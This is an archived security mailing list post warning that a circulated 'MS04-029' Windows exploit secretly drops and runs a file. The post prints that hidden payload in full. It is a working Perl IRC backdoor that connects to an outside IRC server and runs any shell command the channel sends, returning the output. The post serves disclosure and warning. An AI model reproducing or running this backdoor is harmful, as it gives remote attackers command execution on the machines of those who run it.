lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <418953A8.1020704@aol.com>
From: deigodude at aol.com (Deigo Dude)
Subject: New Remote Windows Exploit (MS04-029)

 >>Do i need too say more :D
You sure do, like for example, explain the following in your code and 
why it makes /tmp/hi (/var/tmp/hi)  and then executes it and it contains 
this code
#!/usr/bin/perl
$chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use 
IO::Soc
ket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock 
"USER k +i
k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last 
if $mode=
="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK 
$nick\n";}}prin
t $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING 
(.*)$/){prin
t $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ 
:\w]*:[^ :\w
]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG 
$chan :$
_\n";sleep 1;}}}#/tmp/hi


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ